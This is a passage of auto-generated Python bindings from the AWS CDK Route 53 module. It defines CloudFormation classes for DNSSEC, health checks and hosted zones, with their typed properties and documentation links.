name_mapping={"hosted_zone_id": "hostedZoneId"},
)
class CfnDNSSECProps:
def __init__(self, *, hosted_zone_id: builtins.str) -> None:
'''Properties for defining a ``AWS::Route53::DNSSEC``.
:param hosted_zone_id: ``AWS::Route53::DNSSEC.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html
'''
self._values: typing.Dict[str, typing.Any] = {
"hosted_zone_id": hosted_zone_id,
}
@builtins.property
def hosted_zone_id(self) -> builtins.str:
'''``AWS::Route53::DNSSEC.HostedZoneId``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-dnssec.html#cfn-route53-dnssec-hostedzoneid
'''
result = self._values.get("hosted_zone_id")
assert result is not None, "Required property 'hosted_zone_id' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnDNSSECProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnHealthCheck(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnHealthCheck",
):
'''A CloudFormation ``AWS::Route53::HealthCheck``.
:cloudformationResource: AWS::Route53::HealthCheck
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
health_check_config: typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable],
health_check_tags: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]] = None,
) -> None:
'''Create a new ``AWS::Route53::HealthCheck``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param health_check_config: ``AWS::Route53::HealthCheck.HealthCheckConfig``.
:param health_check_tags: ``AWS::Route53::HealthCheck.HealthCheckTags``.
'''
props = CfnHealthCheckProps(
health_check_config=health_check_config,
health_check_tags=health_check_tags,
)
jsii.create(CfnHealthCheck, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrHealthCheckId")
def attr_health_check_id(self) -> builtins.str:
'''
:cloudformationAttribute: HealthCheckId
'''
return typing.cast(builtins.str, jsii.get(self, "attrHealthCheckId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="healthCheckConfig")
def health_check_config(
self,
) -> typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable]:
'''``AWS::Route53::HealthCheck.HealthCheckConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthcheckconfig
'''
return typing.cast(typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable], jsii.get(self, "healthCheckConfig"))
@health_check_config.setter
def health_check_config(
self,
value: typing.Union["CfnHealthCheck.HealthCheckConfigProperty", aws_cdk.core.IResolvable],
) -> None:
jsii.set(self, "healthCheckConfig", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="healthCheckTags")
def health_check_tags(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]]:
'''``AWS::Route53::HealthCheck.HealthCheckTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthchecktags
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]], jsii.get(self, "healthCheckTags"))
@health_check_tags.setter
def health_check_tags(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.HealthCheckTagProperty"]]]],
) -> None:
jsii.set(self, "healthCheckTags", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.AlarmIdentifierProperty",
jsii_struct_bases=[],
name_mapping={"name": "name", "region": "region"},
)
class AlarmIdentifierProperty:
def __init__(self, *, name: builtins.str, region: builtins.str) -> None:
'''
:param name: ``CfnHealthCheck.AlarmIdentifierProperty.Name``.
:param region: ``CfnHealthCheck.AlarmIdentifierProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html
'''
self._values: typing.Dict[str, typing.Any] = {
"name": name,
"region": region,
}
@builtins.property
def name(self) -> builtins.str:
'''``CfnHealthCheck.AlarmIdentifierProperty.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html#cfn-route53-healthcheck-alarmidentifier-name
'''
result = self._values.get("name")
assert result is not None, "Required property 'name' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def region(self) -> builtins.str:
'''``CfnHealthCheck.AlarmIdentifierProperty.Region``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-alarmidentifier.html#cfn-route53-healthcheck-alarmidentifier-region
'''
result = self._values.get("region")
assert result is not None, "Required property 'region' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "AlarmIdentifierProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.HealthCheckConfigProperty",
jsii_struct_bases=[],
name_mapping={
"type": "type",
"alarm_identifier": "alarmIdentifier",
"child_health_checks": "childHealthChecks",
"enable_sni": "enableSni",
"failure_threshold": "failureThreshold",
"fully_qualified_domain_name": "fullyQualifiedDomainName",
"health_threshold": "healthThreshold",
"insufficient_data_health_status": "insufficientDataHealthStatus",
"inverted": "inverted",
"ip_address": "ipAddress",
"measure_latency": "measureLatency",
"port": "port",
"regions": "regions",
"request_interval": "requestInterval",
"resource_path": "resourcePath",
"search_string": "searchString",
},
)
class HealthCheckConfigProperty:
def __init__(
self,
*,
type: builtins.str,
alarm_identifier: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]] = None,
child_health_checks: typing.Optional[typing.Sequence[builtins.str]] = None,
enable_sni: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
failure_threshold: typing.Optional[jsii.Number] = None,
fully_qualified_domain_name: typing.Optional[builtins.str] = None,
health_threshold: typing.Optional[jsii.Number] = None,
insufficient_data_health_status: typing.Optional[builtins.str] = None,
inverted: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
ip_address: typing.Optional[builtins.str] = None,
measure_latency: typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]] = None,
port: typing.Optional[jsii.Number] = None,
regions: typing.Optional[typing.Sequence[builtins.str]] = None,
request_interval: typing.Optional[jsii.Number] = None,
resource_path: typing.Optional[builtins.str] = None,
search_string: typing.Optional[builtins.str] = None,
) -> None:
'''
:param type: ``CfnHealthCheck.HealthCheckConfigProperty.Type``.
:param alarm_identifier: ``CfnHealthCheck.HealthCheckConfigProperty.AlarmIdentifier``.
:param child_health_checks: ``CfnHealthCheck.HealthCheckConfigProperty.ChildHealthChecks``.
:param enable_sni: ``CfnHealthCheck.HealthCheckConfigProperty.EnableSNI``.
:param failure_threshold: ``CfnHealthCheck.HealthCheckConfigProperty.FailureThreshold``.
:param fully_qualified_domain_name: ``CfnHealthCheck.HealthCheckConfigProperty.FullyQualifiedDomainName``.
:param health_threshold: ``CfnHealthCheck.HealthCheckConfigProperty.HealthThreshold``.
:param insufficient_data_health_status: ``CfnHealthCheck.HealthCheckConfigProperty.InsufficientDataHealthStatus``.
:param inverted: ``CfnHealthCheck.HealthCheckConfigProperty.Inverted``.
:param ip_address: ``CfnHealthCheck.HealthCheckConfigProperty.IPAddress``.
:param measure_latency: ``CfnHealthCheck.HealthCheckConfigProperty.MeasureLatency``.
:param port: ``CfnHealthCheck.HealthCheckConfigProperty.Port``.
:param regions: ``CfnHealthCheck.HealthCheckConfigProperty.Regions``.
:param request_interval: ``CfnHealthCheck.HealthCheckConfigProperty.RequestInterval``.
:param resource_path: ``CfnHealthCheck.HealthCheckConfigProperty.ResourcePath``.
:param search_string: ``CfnHealthCheck.HealthCheckConfigProperty.SearchString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html
'''
self._values: typing.Dict[str, typing.Any] = {
"type": type,
}
if alarm_identifier is not None:
self._values["alarm_identifier"] = alarm_identifier
if child_health_checks is not None:
self._values["child_health_checks"] = child_health_checks
if enable_sni is not None:
self._values["enable_sni"] = enable_sni
if failure_threshold is not None:
self._values["failure_threshold"] = failure_threshold
if fully_qualified_domain_name is not None:
self._values["fully_qualified_domain_name"] = fully_qualified_domain_name
if health_threshold is not None:
self._values["health_threshold"] = health_threshold
if insufficient_data_health_status is not None:
self._values["insufficient_data_health_status"] = insufficient_data_health_status
if inverted is not None:
self._values["inverted"] = inverted
if ip_address is not None:
self._values["ip_address"] = ip_address
if measure_latency is not None:
self._values["measure_latency"] = measure_latency
if port is not None:
self._values["port"] = port
if regions is not None:
self._values["regions"] = regions
if request_interval is not None:
self._values["request_interval"] = request_interval
if resource_path is not None:
self._values["resource_path"] = resource_path
if search_string is not None:
self._values["search_string"] = search_string
@builtins.property
def type(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckConfigProperty.Type``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-type
'''
result = self._values.get("type")
assert result is not None, "Required property 'type' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def alarm_identifier(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.AlarmIdentifier``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-alarmidentifier
'''
result = self._values.get("alarm_identifier")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHealthCheck.AlarmIdentifierProperty"]], result)
@builtins.property
def child_health_checks(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.ChildHealthChecks``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-childhealthchecks
'''
result = self._values.get("child_health_checks")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def enable_sni(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.EnableSNI``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-enablesni
'''
result = self._values.get("enable_sni")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def failure_threshold(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.FailureThreshold``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-failurethreshold
'''
result = self._values.get("failure_threshold")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def fully_qualified_domain_name(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.FullyQualifiedDomainName``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-fullyqualifieddomainname
'''
result = self._values.get("fully_qualified_domain_name")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def health_threshold(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.HealthThreshold``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-healththreshold
'''
result = self._values.get("health_threshold")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def insufficient_data_health_status(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.InsufficientDataHealthStatus``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-insufficientdatahealthstatus
'''
result = self._values.get("insufficient_data_health_status")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def inverted(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Inverted``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-inverted
'''
result = self._values.get("inverted")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def ip_address(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.IPAddress``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-ipaddress
'''
result = self._values.get("ip_address")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def measure_latency(
self,
) -> typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.MeasureLatency``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-measurelatency
'''
result = self._values.get("measure_latency")
return typing.cast(typing.Optional[typing.Union[builtins.bool, aws_cdk.core.IResolvable]], result)
@builtins.property
def port(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Port``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-port
'''
result = self._values.get("port")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def regions(self) -> typing.Optional[typing.List[builtins.str]]:
'''``CfnHealthCheck.HealthCheckConfigProperty.Regions``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-regions
'''
result = self._values.get("regions")
return typing.cast(typing.Optional[typing.List[builtins.str]], result)
@builtins.property
def request_interval(self) -> typing.Optional[jsii.Number]:
'''``CfnHealthCheck.HealthCheckConfigProperty.RequestInterval``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-requestinterval
'''
result = self._values.get("request_interval")
return typing.cast(typing.Optional[jsii.Number], result)
@builtins.property
def resource_path(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.ResourcePath``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-resourcepath
'''
result = self._values.get("resource_path")
return typing.cast(typing.Optional[builtins.str], result)
@builtins.property
def search_string(self) -> typing.Optional[builtins.str]:
'''``CfnHealthCheck.HealthCheckConfigProperty.SearchString``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthcheckconfig.html#cfn-route53-healthcheck-healthcheckconfig-searchstring
'''
result = self._values.get("search_string")
return typing.cast(typing.Optional[builtins.str], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HealthCheckConfigProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheck.HealthCheckTagProperty",
jsii_struct_bases=[],
name_mapping={"key": "key", "value": "value"},
)
class HealthCheckTagProperty:
def __init__(self, *, key: builtins.str, value: builtins.str) -> None:
'''
:param key: ``CfnHealthCheck.HealthCheckTagProperty.Key``.
:param value: ``CfnHealthCheck.HealthCheckTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html
'''
self._values: typing.Dict[str, typing.Any] = {
"key": key,
"value": value,
}
@builtins.property
def key(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckTagProperty.Key``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html#cfn-route53-healthcheck-healthchecktag-key
'''
result = self._values.get("key")
assert result is not None, "Required property 'key' is missing"
return typing.cast(builtins.str, result)
@builtins.property
def value(self) -> builtins.str:
'''``CfnHealthCheck.HealthCheckTagProperty.Value``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-healthcheck-healthchecktag.html#cfn-route53-healthcheck-healthchecktag-value
'''
result = self._values.get("value")
assert result is not None, "Required property 'value' is missing"
return typing.cast(builtins.str, result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "HealthCheckTagProperty(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHealthCheckProps",
jsii_struct_bases=[],
name_mapping={
"health_check_config": "healthCheckConfig",
"health_check_tags": "healthCheckTags",
},
)
class CfnHealthCheckProps:
def __init__(
self,
*,
health_check_config: typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable],
health_check_tags: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]] = None,
) -> None:
'''Properties for defining a ``AWS::Route53::HealthCheck``.
:param health_check_config: ``AWS::Route53::HealthCheck.HealthCheckConfig``.
:param health_check_tags: ``AWS::Route53::HealthCheck.HealthCheckTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html
'''
self._values: typing.Dict[str, typing.Any] = {
"health_check_config": health_check_config,
}
if health_check_tags is not None:
self._values["health_check_tags"] = health_check_tags
@builtins.property
def health_check_config(
self,
) -> typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable]:
'''``AWS::Route53::HealthCheck.HealthCheckConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthcheckconfig
'''
result = self._values.get("health_check_config")
assert result is not None, "Required property 'health_check_config' is missing"
return typing.cast(typing.Union[CfnHealthCheck.HealthCheckConfigProperty, aws_cdk.core.IResolvable], result)
@builtins.property
def health_check_tags(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]]:
'''``AWS::Route53::HealthCheck.HealthCheckTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-healthcheck.html#cfn-route53-healthcheck-healthchecktags
'''
result = self._values.get("health_check_tags")
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, CfnHealthCheck.HealthCheckTagProperty]]]], result)
def __eq__(self, rhs: typing.Any) -> builtins.bool:
return isinstance(rhs, self.__class__) and rhs._values == self._values
def __ne__(self, rhs: typing.Any) -> builtins.bool:
return not (rhs == self)
def __repr__(self) -> str:
return "CfnHealthCheckProps(%s)" % ", ".join(
k + "=" + repr(v) for k, v in self._values.items()
)
@jsii.implements(aws_cdk.core.IInspectable)
class CfnHostedZone(
aws_cdk.core.CfnResource,
metaclass=jsii.JSIIMeta,
jsii_type="@aws-cdk/aws-route53.CfnHostedZone",
):
'''A CloudFormation ``AWS::Route53::HostedZone``.
:cloudformationResource: AWS::Route53::HostedZone
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html
'''
def __init__(
self,
scope: aws_cdk.core.Construct,
id: builtins.str,
*,
name: builtins.str,
hosted_zone_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]] = None,
hosted_zone_tags: typing.Optional[typing.Sequence["CfnHostedZone.HostedZoneTagProperty"]] = None,
query_logging_config: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]] = None,
vpcs: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.Sequence[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]] = None,
) -> None:
'''Create a new ``AWS::Route53::HostedZone``.
:param scope: - scope in which this resource is defined.
:param id: - scoped id of the resource.
:param name: ``AWS::Route53::HostedZone.Name``.
:param hosted_zone_config: ``AWS::Route53::HostedZone.HostedZoneConfig``.
:param hosted_zone_tags: ``AWS::Route53::HostedZone.HostedZoneTags``.
:param query_logging_config: ``AWS::Route53::HostedZone.QueryLoggingConfig``.
:param vpcs: ``AWS::Route53::HostedZone.VPCs``.
'''
props = CfnHostedZoneProps(
name=name,
hosted_zone_config=hosted_zone_config,
hosted_zone_tags=hosted_zone_tags,
query_logging_config=query_logging_config,
vpcs=vpcs,
)
jsii.create(CfnHostedZone, self, [scope, id, props])
@jsii.member(jsii_name="inspect")
def inspect(self, inspector: aws_cdk.core.TreeInspector) -> None:
'''Examines the CloudFormation resource and discloses attributes.
:param inspector: - tree inspector to collect and process attributes.
'''
return typing.cast(None, jsii.invoke(self, "inspect", [inspector]))
@jsii.member(jsii_name="renderProperties")
def _render_properties(
self,
props: typing.Mapping[builtins.str, typing.Any],
) -> typing.Mapping[builtins.str, typing.Any]:
'''
:param props: -
'''
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.invoke(self, "renderProperties", [props]))
@jsii.python.classproperty # type: ignore[misc]
@jsii.member(jsii_name="CFN_RESOURCE_TYPE_NAME")
def CFN_RESOURCE_TYPE_NAME(cls) -> builtins.str:
'''The CloudFormation resource type name for this resource class.'''
return typing.cast(builtins.str, jsii.sget(cls, "CFN_RESOURCE_TYPE_NAME"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrId")
def attr_id(self) -> builtins.str:
'''
:cloudformationAttribute: Id
'''
return typing.cast(builtins.str, jsii.get(self, "attrId"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="attrNameServers")
def attr_name_servers(self) -> typing.List[builtins.str]:
'''
:cloudformationAttribute: NameServers
'''
return typing.cast(typing.List[builtins.str], jsii.get(self, "attrNameServers"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="cfnProperties")
def _cfn_properties(self) -> typing.Mapping[builtins.str, typing.Any]:
return typing.cast(typing.Mapping[builtins.str, typing.Any], jsii.get(self, "cfnProperties"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="tags")
def tags(self) -> aws_cdk.core.TagManager:
'''``AWS::Route53::HostedZone.HostedZoneTags``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzonetags
'''
return typing.cast(aws_cdk.core.TagManager, jsii.get(self, "tags"))
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="name")
def name(self) -> builtins.str:
'''``AWS::Route53::HostedZone.Name``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-name
'''
return typing.cast(builtins.str, jsii.get(self, "name"))
@name.setter
def name(self, value: builtins.str) -> None:
jsii.set(self, "name", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="hostedZoneConfig")
def hosted_zone_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]]:
'''``AWS::Route53::HostedZone.HostedZoneConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-hostedzoneconfig
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]], jsii.get(self, "hostedZoneConfig"))
@hosted_zone_config.setter
def hosted_zone_config(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.HostedZoneConfigProperty"]],
) -> None:
jsii.set(self, "hostedZoneConfig", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="queryLoggingConfig")
def query_logging_config(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]]:
'''``AWS::Route53::HostedZone.QueryLoggingConfig``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-queryloggingconfig
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]], jsii.get(self, "queryLoggingConfig"))
@query_logging_config.setter
def query_logging_config(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.QueryLoggingConfigProperty"]],
) -> None:
jsii.set(self, "queryLoggingConfig", value)
@builtins.property # type: ignore[misc]
@jsii.member(jsii_name="vpcs")
def vpcs(
self,
) -> typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]]:
'''``AWS::Route53::HostedZone.VPCs``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-resource-route53-hostedzone.html#cfn-route53-hostedzone-vpcs
'''
return typing.cast(typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]], jsii.get(self, "vpcs"))
@vpcs.setter
def vpcs(
self,
value: typing.Optional[typing.Union[aws_cdk.core.IResolvable, typing.List[typing.Union[aws_cdk.core.IResolvable, "CfnHostedZone.VPCProperty"]]]],
) -> None:
jsii.set(self, "vpcs", value)
@jsii.data_type(
jsii_type="@aws-cdk/aws-route53.CfnHostedZone.HostedZoneConfigProperty",
jsii_struct_bases=[],
name_mapping={"comment": "comment"},
)
class HostedZoneConfigProperty:
def __init__(self, *, comment: typing.Optional[builtins.str] = None) -> None:
'''
:param comment: ``CfnHostedZone.HostedZoneConfigProperty.Comment``.
:link: http://docs.aws.amazon.com/AWSCloudFormation/latest/UserGuide/aws-properties-route53-hostedzone-hostedzoneconfig.html
'''
self._values: typing.Dict[str, typing.Any] = {}
if comment is not None:
self._values["comment"] = comment
@builtins.property
def comment(self) -> typing.Optional[builtins.str]:
'''``CfnHostedZone.HostedZoneConfigProperty.Comment``.
